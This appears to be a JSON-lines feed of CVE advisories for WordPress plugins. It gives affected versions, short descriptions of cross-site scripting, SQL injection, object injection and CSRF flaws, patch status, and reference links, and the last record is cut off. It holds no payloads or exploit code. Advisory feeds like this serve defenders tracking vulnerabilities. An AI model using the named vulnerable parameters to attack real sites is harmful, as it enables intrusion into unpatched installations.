{"CVE_ID":"CVE-2024-13878","slug":"spotbot","versionImpact":"0.1.8","description":"The SpotBot WordPress plugin through 0.1.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/882b2022-4ed6-4d9e-8b35-f48ea1580884\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/882b2022-4ed6-4d9e-8b35-f48ea1580884\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2575","slug":"z-companion","versionImpact":"1.1.1","description":"The Z Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. Note: This requires the Royal Shop theme to be installed.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/importer\\\/wxr-importer.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/importer\\\/wxr-importer.php#L149\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/importer\\\/wxr-importer.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/importer\\\/wxr-importer.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/inc\\\/importer.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/inc\\\/importer.php#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/inc\\\/importer.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/inc\\\/importer.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270130\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270130\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/z-companion\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/z-companion\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0f7bba4-76c3-4904-bd96-2074147b33f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0f7bba4-76c3-4904-bd96-2074147b33f5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4803","slug":"wppedia","versionImpact":"1.3.0","description":"The Glossary by WPPedia \u2013 Best Glossary plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.0 via deserialization of untrusted input from the 'posttypes' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like deleting arbitrary files, retrieving sensitive data, or executing code, depending on the POP chain present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/bfiessinger\\\/wppedia\\\/blob\\\/1d0b8568349c9c9479372f845a812eb2aa4b3d09\\\/core\\\/classes\\\/traits\\\/trait-sanitizes-data.php#L64\",\"name\":\"https:\\\/\\\/github.com\\\/bfiessinger\\\/wppedia\\\/blob\\\/1d0b8568349c9c9479372f845a812eb2aa4b3d09\\\/core\\\/classes\\\/traits\\\/trait-sanitizes-data.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wppedia\\\/tags\\\/1.3.0\\\/core\\\/classes\\\/class-options.php#L396\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wppedia\\\/tags\\\/1.3.0\\\/core\\\/classes\\\/class-options.php#L396\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wppedia\\\/tags\\\/1.3.0\\\/core\\\/classes\\\/traits\\\/trait-sanitizes-data.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wppedia\\\/tags\\\/1.3.0\\\/core\\\/classes\\\/traits\\\/trait-sanitizes-data.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53fb54bc-6eaa-4e99-a41c-e59a9bae81e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53fb54bc-6eaa-4e99-a41c-e59a9bae81e5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5842","slug":"mdl-shortcodes","versionImpact":"1.1.4","description":"The Modern Design Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018class\u2019 parameter in all versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mdl-shortcodes\\\/trunk\\\/mdl-shortcodes.php#L197\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mdl-shortcodes\\\/trunk\\\/mdl-shortcodes.php#L197\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3317171\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3317171\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mdl-shortcodes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mdl-shortcodes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1be519d5-b505-4b5d-9f14-c8544e8f8298?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1be519d5-b505-4b5d-9f14-c8544e8f8298?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6382","slug":"taeggie-feed","versionImpact":"0.1.10","description":"The Taeggie Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's taeggie-feed shortcode in all versions up to, and including, 0.1.10. The plugin\u2019s render() method takes the user-supplied name attribute and injects it directly into a <script> tag - both in the id attribute and inside jQuery.getScript() - without proper escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taeggie-feed\\\/trunk\\\/taeggie_feed.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taeggie-feed\\\/trunk\\\/taeggie_feed.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taeggie-feed\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taeggie-feed\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7f5ac78-5195-4b59-abc7-f41e487f9361?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7f5ac78-5195-4b59-abc7-f41e487f9361?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28663","slug":"formidablepro-2-pdf","versionImpact":"3.09","description":"The Formidable PRO2PDF WordPress Plugin, version < 3.11, is affected by an authenticated SQL injection vulnerability in the \u2018fieldmap\u2019 parameter in the fpropdf_export_file action.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2716","slug":"groundhogg","versionImpact":"2.7.9.8","description":"The Groundhogg plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the 'ajax_upload_file' function in versions up to, and including, 2.7.9.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload a file to a contact and then list all the other files uploaded for that contact.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c5bde0e-3138-4995-92ae-6deaf6b7be5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c5bde0e-3138-4995-92ae-6deaf6b7be5b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/contacts\\\/contacts-page.php#L458\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/contacts\\\/contacts-page.php#L458\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/contacts\\\/contacts-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/contacts\\\/contacts-page.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5334","slug":"responsive-header-image-slider","versionImpact":"3.2.1","description":"The WP Responsive header image slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'sp_responsiveslider' shortcode in versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6953dea2-ca2d-4283-97c2-45c3420d9390?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6953dea2-ca2d-4283-97c2-45c3420d9390?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-header-image-slider\\\/trunk\\\/responsive_headerimageslider.php#L343\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-header-image-slider\\\/trunk\\\/responsive_headerimageslider.php#L343\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2350","slug":"cafe-lite","versionImpact":"2.1.9","description":"The Clever Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the CAFE Icon, CAFE Team Member, and CAFE Slider widgets in all versions up to, and including, 2.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca5befe9-7769-4367-84cf-05aabeced67a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca5befe9-7769-4367-84cf-05aabeced67a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-icon.php#L396\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-icon.php#L396\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-team-member.php#L948\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-team-member.php#L948\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-slider.php#L1394\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-slider.php#L1394\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7548","slug":"learnpress","versionImpact":"4.2.6.9.3","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the 'order' parameter in all versions up to, and including, 4.2.6.9.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/702715a9-b180-4d31-a1df-37b732ae8226?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/702715a9-b180-4d31-a1df-37b732ae8226?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/trunk\\\/inc\\\/curds\\\/class-lp-course-curd.php#L828\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/trunk\\\/inc\\\/curds\\\/class-lp-course-curd.php#L828\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/learnpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/learnpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/learnpress\\\/tags\\\/4.2.6.9.3\\\/inc\\\/curds\\\/class-lp-course-curd.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/learnpress\\\/tags\\\/4.2.6.9.3\\\/inc\\\/curds\\\/class-lp-course-curd.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132019\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132019\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132002\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132002\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6855","slug":"wp-multitasking","versionImpact":"0.1.12","description":"The WP MultiTasking WordPress plugin through 0.1.12 does not have a CSRF check when updating exit popups, which could allow attackers to make logged-in admins perform such an action via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1124b07a-6274-49df-be77-615fda8f3a38\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1124b07a-6274-49df-be77-615fda8f3a38\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9366","slug":"easy-menu-manager-wpzest","versionImpact":"1.0.1","description":"The Easy Menu Manager | WPZest plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f60df43a-eef3-449d-96fd-b26e28361f81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f60df43a-eef3-449d-96fd-b26e28361f81?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-menu-manager-wpzest\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-menu-manager-wpzest\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9170","slug":"woocommerce-jetpack","versionImpact":"7.2.3","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wcj_product_meta shortcode in all versions up to, and including, 7.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with ShopManager-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/booster.io\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/booster.io\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/booster.io\\\/shortcodes\\\/wcj_product_meta\\\/\",\"name\":\"https:\\\/\\\/booster.io\\\/shortcodes\\\/wcj_product_meta\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-shortcodes.php#L963\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-shortcodes.php#L963\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3187178\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3187178\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-jetpack\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-jetpack\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0abf9705-2716-403f-9348-e43a8d8fb1d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0abf9705-2716-403f-9348-e43a8d8fb1d2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12572","slug":"hello-in-all-languages","versionImpact":"1.0.6","description":"The Hello In All Languages plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.6. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hello-in-all-languages\\\/trunk\\\/hello-in-all-languages.php#L398\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hello-in-all-languages\\\/trunk\\\/hello-in-all-languages.php#L398\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85501fc0-5d51-492b-b208-4b84f371ee77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85501fc0-5d51-492b-b208-4b84f371ee77?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13334","slug":"car-demon","versionImpact":"1.8.1","description":"The Car Demon plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'search_condition' parameter in all versions up to, and including, 1.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/car-demon\\\/trunk\\\/search\\\/search-form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/car-demon\\\/trunk\\\/search\\\/search-form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d50b1c0-9687-4ce2-bfba-c2d6a2fc28dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d50b1c0-9687-4ce2-bfba-c2d6a2fc28dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13706","slug":"wp-image-uploader","versionImpact":"1.0.1","description":"The WP Image Uploader plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'file' parameter in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-uploader\\\/trunk\\\/index.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-uploader\\\/trunk\\\/index.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fea1546c-1d8f-4478-81b7-20a9096e0217?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fea1546c-1d8f-4478-81b7-20a9096e0217?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12813","slug":"open-hours","versionImpact":"1.0.9","description":"The Open Hours \u2013  Easy Opening Hours plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'open-hours-current-status' shortcode in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/open-hours\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/open-hours\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3feb5f46-e861-40ec-84e8-aade0667eec6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3feb5f46-e861-40ec-84e8-aade0667eec6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13877","slug":"passbeemedia-web-push-notifications","versionImpact":"1.0.0","description":"The Passbeemedia Web Push Notification WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e8ce3cf-1598-4c5d-b119-99d5f676e619\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e8ce3cf-1598-4c5d-b119-99d5f676e619\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2541","slug":"wedevs-project-manager","versionImpact":"2.6.22","description":"The WP Project Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.6.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.6.20\\\/core\\\/WP\\\/Frontend.php#L209\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.6.20\\\/core\\\/WP\\\/Frontend.php#L209\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268509\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268509\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wedevs-project-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wedevs-project-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcc68b62-7dd1-47d4-bbc5-d0237b7c85e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcc68b62-7dd1-47d4-bbc5-d0237b7c85e7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4611","slug":"slim-seo","versionImpact":"4.5.3","description":"The Slim SEO \u2013 Fast & Automated WordPress SEO Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's slim_seo_breadcrumbs shortcode in all versions up to, and including, 4.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/elightup\\\/slim-seo\\\/commit\\\/b475dceff3a6bd94335d5a79eb12cdd92e2c8350\",\"name\":\"https:\\\/\\\/github.com\\\/elightup\\\/slim-seo\\\/commit\\\/b475dceff3a6bd94335d5a79eb12cdd92e2c8350\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slim-seo\\\/tags\\\/4.5.3\\\/src\\\/Breadcrumbs.php#L109\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slim-seo\\\/tags\\\/4.5.3\\\/src\\\/Breadcrumbs.php#L109\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slim-seo\\\/tags\\\/4.5.3\\\/src\\\/Breadcrumbs.php#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slim-seo\\\/tags\\\/4.5.3\\\/src\\\/Breadcrumbs.php#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slim-seo\\\/tags\\\/4.5.3\\\/src\\\/Breadcrumbs.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slim-seo\\\/tags\\\/4.5.3\\\/src\\\/Breadcrumbs.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3296099\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\